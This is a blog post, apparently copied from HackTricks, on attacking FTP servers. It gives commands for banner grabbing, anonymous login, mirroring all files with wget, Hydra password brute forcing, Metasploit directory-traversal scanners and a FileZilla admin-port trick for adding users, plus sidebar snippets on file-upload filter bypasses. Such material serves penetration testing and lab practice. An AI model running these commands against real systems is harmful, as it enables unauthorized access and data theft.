Hacking FTP | How to hack FTP

  • What is FTP:-

The File Transfer Protocol (FTP) is a standard network protocol used for the transfer of computer files between a client and server on a computer network.

Default Port:- 21

Enumeration:-

Banner Grabbing:

nc -vn <IP> 21

openssl s_client -connect crossfit.htb:21 -starttls ftp #Get certificate if any

Anonymous login:-

anonymous : anonymous anonymous : ftp : ftp

ftp <IP> >anonymous

>anonymous

>ls -a # List all files (even hidden)yes, they could be hidden)

>binary #Set transmission to binaryinstead of ascii

>ascii #Set transmission to ascii

instead of binary>

bye #exit

Automated:-

Anon login and bounce FTP checks

are perform by default by nmap

with -sC option or

: nmap --script ftp-* -p 21 <ip>

Download all files from FTP:-

wget -m ftp://anonymous:anonymous@10.10.10.98 #Donwload all wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Download all

Filezilla Server Vulnerability:-

FileZilla usually binds to local
an Administrative service for the FileZilla-Server
(port 14147). If you can create
a tunnel from your machine to
access this port, you
can connect to it using a blank    password and create a new user for the FTP service.

Config files:-

  • ftpusers
  • proftpd.conf
  • ftp.conf
HackTricks Automatic Commands:-

Protocol_Name: FTP #Protocol Abbreviation if there is one. Port_Number: 21 #Comma separated if there is more than one. Protocol_Description: File Transfer Protocol #Protocol Abbreviation Spelled
out Entry_1: Name: Notes Description: Notes for FTP Note: | Anonymous Login -bi <<< so that your put is done via binary wget --mirror 'ftp://ftp_user:UTDRSCH53c"$6hys@10.10.10.59' ^^to download all dirs and files wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@10.10.10.98' if PASV transfer is disabled https://book.hacktricks.xyz/pentesting/pentesting-ftp Entry_2: Name: Banner Grab Description: Grab FTP Banner via telnet Command: telnet -n {IP} 21 Entry_3: Name: Cert Grab Description: Grab FTP Certificate if existing Command: openssl s_client -connect {IP}:21 -starttls ftp Entry_4: Name: nmap ftp Description: Anon login and bounce FTP checks are performed Command: nmap --script ftp-* -p 21 {IP} Entry_5: Name: Browser Connection Description: Connect with Browser Note: ftp://anonymous:anonymous@{IP} Entry_6: Name: Hydra Brute Force Description: Need Username Command: hydra -t 1 -l {Username} -P {Big_Passwordlist} -vV {IP} ftp Entry_7: Name: consolesless mfs enumeration ftp Description: FTP enumeration without the need to run msfconsole Note: sourced from https://github.com/carlospolop/legion Command: msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS {IP};
set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version;
set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal;
set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal;
set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal;
set RHOSTS {IP}; set RPORT 21; run; exit'

Comments

Post a Comment

Popular posts from this blog

How to decrypt message with CryptoJS AES

  Javascript code to decrypt message using crypto js : - data = " IYkyGxYaNgHpnZWgwILMalVFmLWFgTCHCZL9263NOcfSo5lBjAzOZAtF5bF++R0Bi+9c9E+p3VEr/xvj4oABtRWVJ2wlWzLbYC2rKFk5iapFhb7uZCUpO4w4Su3a5QFa2vInjYueziRoqySZd/DpstMJ8rsJ94VGizFFFZ1l0sw1ax+wfBA v5+wHs/hlnHi/ea66KBO3rgXKahvV28h+4bh5etc8RCrmiiNbfg6Oj0jQJDjdYIdW8T9YPOI9E1hih8lbfRnMWcOFJgYekfLpoy5LI525UGnlM46J1k6ekLqsn9FqvbiOOoLgqa4YqBm1i9P0ePyjkME+t+RiL8xXX+ItgOYr9G7kM64wlTJPCW8B/crmUdmGzQNC/hD/u/8wfHBS2f8u6OtQMG/+Kpk1oju8lcUZGI/4S8A6/OuktvQr2zgnbs2aADMrM37Oait/pJ3G73S7NwVT8EaK+X43c0C/fUvW2/bD/rqCNpAh9WQlz4Cj6JHwjbmwuind6aCimF1tHjXuR9FXu+g17sPT4ZkKZ6aeBG+m170XdCGn2hVM0wH1rh3VeCG2u/JFqfuGKGSoqeHeNY/icu9pEhtZDzHd7aPoaMXcWvXC9PjooBf7GM1EPacSdnon1kBobjtKSt1l15DjO5TMrJoX7VO7GotQwo+uI/u5Kop01hBXxyxyggl1/8N0ESohPJoqLDrIwvbGK5kW4B49FVPnx9CMvjZDdSsoxPAh+hx6SPe8Hj0Nx4bRs06cbtOkte/V8QSYIqjiJDleEqPrdiKlvgToZz9L29ZR/3Ln65qU1sq7q9c0SEYxIopV7TdTjFS7y76zDPFZkhzc3DjfLtJo/M1hdtt648APcZdmAIgWH6fh3eJZ0qbiPh8RStYH7I2COmnlMw4+t/B5mlhYVSgwPK2Ir736Mh+P9Bw...
Read more

libcurl (curl-impersonate) bindings for Node.js

  Description  :-   libcurl is a free and easy-to-use client-side URL transfer library, supporting DICT, FILE, FTP, FTPS, Gopher, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMTP, SMTPS, Telnet and TFTP. libcurl supports SSL certificates, HTTP POST, HTTP PUT, FTP uploading, HTTP form based upload, proxies, cookies, user+password authentication (Basic, Digest, NTLM, Negotiate, Kerberos), file transfer resume, http proxy tunneling and more! Note:- This library cannot be used in a browser, it depends on native code. Installation :- npm i node-libcurl --save Or yarn add node-libcurl Further description :- https://github.com/SwapnilSoni1999/node-libcurl-impersonate
Read more

File upload bypass

  File Upload General Methodology :- Other useful extensions: PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action Coldfusion: .cfm, .cfml, .cfc, .dbm Flash: .swf Perl: .pl, .cgi Erlang Yaws Web Server: .yaws Bypass file extensions checks :- Try adding special characters at the end. You could use Burp to bruteforce all the ascii and Unicode characters. (Note that you can also try to use the previously motioned extensions) file.php%20 file.php%0a file.php%00 file.php%0d%0a file.php/ file.php.\ file. file.php.... file.pHp5.... Magic Header Bytes :- PNG : " \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[ " JPG : " \xff\xd8\xff " From File upload to other vulnerabilities :- Set filename to ../../../tmp/lol.png and try to a...
Read more